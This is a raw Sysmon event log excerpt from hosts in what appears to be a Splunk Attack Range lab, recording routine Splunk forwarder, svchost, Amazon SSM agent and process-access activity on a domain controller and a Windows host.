11:29:53.470{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000299877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:52.646{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49663-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:54.539{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E4F1C5E4144617686EC33A85362A7A7,SHA256=AA8C9126E5185221CA8968052D79E620296B07F677B0FF8ED807E9D5875E6F59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223695Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:54.596{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F752E6B087F48BC242BC068071CFA9AC,SHA256=003ECFBF251C02FBB93D8DB949224FB2645B20936BF150FFC1EFD389FA3C1D31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223696Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:55.706{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3743A3B095BB2AB91D03E06C54C382,SHA256=0553FAEA1EA03E8C279C0781BE731F91ABF9FC8CA3091FADF72524D46F5123BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:55.554{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57AE94585E94C84EB1C0C40CFC87BD21,SHA256=65306103EFBDA1628CFE3FFEE1B74FEBCC71A5FD8380396DD7C3A2EAB2E46082,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223699Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:56.792{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F0B05817F3549803690A7AE2DC9C7EB,SHA256=A36FCF94C636E05522176E314A30DAC05B88E7590C3CADEB468D3404CFB3EE23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299879Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:56.569{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E16D5324BE3759CEBEDEBE3668733FD7,SHA256=D5721B6C13E618853EF8F16A0822FCF0FA8496448E0DA550FB3F1A9BE06CAE6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223698Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:53.540{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51802-false10.0.1.12-8000- 23542300x8000000000000000223697Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:56.294{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-172MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223701Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:57.855{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63EE8D1F425CF4CCEFB9C51B9190BAE7,SHA256=47AC9A99F24215D08BE7A5A4B01602D94FF94017F963A733AAC5C57415592818,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299880Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:57.606{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B1D5C5945FDDBA73420DFF3F0CBB229,SHA256=13919CEF873624D3A7E9D76EDD95BF23A5DD77398D6F0A12C89D18D1620FFA76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223700Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:57.277{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-173MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223702Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:58.870{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B085E2B43C48FFCE1583390FCD64EADF,SHA256=F30143F224F56DF5FEEA3D16E6F9AC88522B260BD3961FEDEEC441A5C58E37FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299881Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:58.621{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2FA025BCD71AAE27C9B5AF9A8D99ED5,SHA256=95D2FA703AFFD3526884EBAA83248C174EEE50093329CFC8498A44DA5C70151F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299882Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:59.636{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB515339815DC480D22EF58DBE71651,SHA256=C1EDBFDA1B944B4DD3EA92694F29F142A85D314E79818277AF79EE255973B00F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:58.596{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49667-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:00.666{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C678F57D260F8B1DE00619B5E9DA8FE9,SHA256=5741DDDC95DF176A131C8E4E8F6622E064FE787741AA00E199717E04F442F96A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223704Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:58.547{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51803-false10.0.1.12-8000- 23542300x8000000000000000223703Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:00.105{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34E743C96803671EBA4A4E88EB505B11,SHA256=8401F31989B3EA9AC8211CD3728093DDE6F7442183483AF614F8BA5CDD88519C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:01.667{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A4DCE6F752F65A172D75C2227CF51F0,SHA256=DE5FC10CDB84D49C379550401361B0F5491AF8C9D11639B522CB0DE09C0FAA23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223705Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:01.167{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CD16FA8282D4984730D4CFE0D96EE65,SHA256=A19CE942F96FDB3727D38E2C3A4271BB29201617269DF11CE9A729C942580C85,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:01.466{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1AB9-6216-8C07-000000003802}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299891Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:01.466{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299890Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:01.466{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299889Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:01.466{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299888Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:01.466{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:01.466{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1AB9-6216-8C07-000000003802}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:01.466{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1AB9-6216-8C07-000000003802}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:01.467{C8EA50B7-1AB9-6216-8C07-000000003802}6344C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223706Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:30:02.183{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=271B86C60A909115FB8CA7826608C451,SHA256=FC77056AD2D795107C33699F96C8BF16972C6295CFAE9D7578D6467EC7B603D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:02.752{C8EA50B7-1ABA-6216-8D07-000000003802}60966572C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299902Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:02.705{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81C65B2FA1F6F5A78479C42E74AE517F,SHA256=2FB9AB8CB36B6B30509301F29B6A232AB246D78216DEE273DB2E1BE590E060EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299901Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:02.320{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1ABA-6216-8D07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299900Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:02.320{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299899Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:02.320{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:02.320{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:30:02.320{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791